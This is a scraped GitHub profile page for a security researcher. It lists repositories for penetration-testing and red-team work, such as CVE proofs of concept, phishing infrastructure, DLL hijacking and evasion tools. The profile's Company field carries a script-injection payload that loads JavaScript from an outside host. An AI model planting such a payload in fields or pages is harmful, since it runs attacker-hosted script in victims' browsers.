Andy | ZephrFish (ZephrFish)

ZephrFish

Geek Repo

Company:"><script src="https://xss.r1.pe"></script>

Location:Scotland

Home Page:https://blog.zsec.uk

Twitter:@ZephrFish

Github PK Tool:Github PK Tool


Organizations
dc44141

Andy | ZephrFish's repositories

RandomScripts

Random Shell Scripts and other ideas I have along the way

Language:PowerShellStargazers:61Issues:0Issues:0

ChunkyIngress

Leverages B64 chunks to split files and save to clipboard

Language:PowerShellStargazers:23Issues:0Issues:0

HelpColor

Agressor script that lists available Cobalt Strike beacon commands and colors them based on their type

License:BSD-3-ClauseStargazers:0Issues:0Issues:0

CVE-2024-4577-PHP-RCE

PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template

Language:GoStargazers:6Issues:0Issues:0

Evilginx-Phishing-Infra-Setup

Evilginx Phishing Engagement Infrastructure Setup Guide

Stargazers:0Issues:0Issues:0
Language:C#Stargazers:1Issues:0Issues:0

AutoHoneyPoC

AutoPoC Generator HoneyPoC

Language:PythonStargazers:33Issues:0Issues:0

Spartacus

Spartacus DLL/COM Hijacking Toolkit

Language:C#License:MITStargazers:0Issues:0Issues:0

NotProxyShellScanner

Python implementation for NotProxyShell aka CVE-2022-40140 & CVE-2022-41082

Language:PythonStargazers:8Issues:0Issues:0

C-from-Scratch

A roadmap to learn C from Scratch

Stargazers:0Issues:0Issues:0

ADFSDump-PS

PowerShell Implementation of ADFSDump to assist with GoldenSAML

Language:PowerShellStargazers:28Issues:0Issues:0

HelloJackHunter

Research into WinSxS binaries and finding hijackable paths

Language:C#Stargazers:16Issues:0Issues:0

OffensiveCpp

This repo contains C/C++ snippets that can be handy in specific offensive scenarios.

Stargazers:1Issues:0Issues:0

zephrfish.github.io

zsec backup blog

Stargazers:3Issues:0Issues:0
Stargazers:8Issues:0Issues:0

DLL-Exports-Reverse-Proxy-Gen

A simple python tool to generate a a header file of correctly formatted DLL export function forwards for all functions exported by the target DLL.

Language:CStargazers:1Issues:0Issues:0

IconJector

Unorthodox and stealthy way to inject a DLL into the explorer using icons

Stargazers:0Issues:0Issues:0
Language:PythonStargazers:15Issues:0Issues:0

GOAD

game of active directory but on Windows

Language:PowerShellLicense:GPL-3.0Stargazers:0Issues:0Issues:0

allthewayback

Search the Wayback Machine for specific historical files which may contain sensitive data.

Language:PythonStargazers:0Issues:0Issues:0

BadShares

A tool to create randomly insecure file shares that also contain unsecured credential files

Stargazers:1Issues:0Issues:0

SandboxSpy

Code for profiling sandboxes - Initially an idea to profile sandboxes, the code is written to take enviromental variables and send them back in a Base32 string over HTTP to an endpoint.

Language:GoStargazers:18Issues:0Issues:0

CVE-2024-3400-Canary

Have we not learnt from HoneyPoC?

Language:PythonStargazers:2Issues:0Issues:0

Burp2API

Converting your Burp Suite projects into JSON APIs

Language:PythonStargazers:0Issues:0Issues:0

WebSocketsAreFun

FAFO with WebSockets

Language:PowerShellStargazers:3Issues:0Issues:0

DynamicMSBuilder

A Dynamic MSBuild task to help with minor obfuscation of C# Binaries to evade static signatures on each compilation

Language:C#Stargazers:30Issues:0Issues:0

CVE-2023-34362

CVE-2023-34362: MOVEit Transfer Unauthenticated RCE

Language:RubyStargazers:19Issues:0Issues:0

WindowsHardeningScript

Some settings stolen from multiple scripts @ZephrFish

Language:BatchfileStargazers:109Issues:0Issues:0
Stargazers:0Issues:0Issues:0